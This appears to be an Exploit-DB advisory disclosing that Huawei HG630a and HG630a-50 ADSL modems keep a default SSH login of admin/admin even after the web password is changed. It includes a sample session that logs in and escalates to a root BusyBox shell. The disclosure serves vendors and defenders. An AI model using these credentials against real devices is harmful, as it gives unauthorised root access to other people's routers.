Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems

EDB-ID:

38663

CVE:





Platform:

Hardware

Date:

2015-11-10


# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin  (@murtshn)
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows

Adsl modems force you to change admin web interface password. Even though
you can change admin password on the web interface,  the password you
assign does not apply to ssh. So, SSH password always  will be
'Username:admin Password:admin'.

Ex:

*ssh admin@modemIP <admin@192.168.1.1>*
admin@modemIP <admin@192.168.1.1>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell


BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /proc/version
cat /proc/version
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#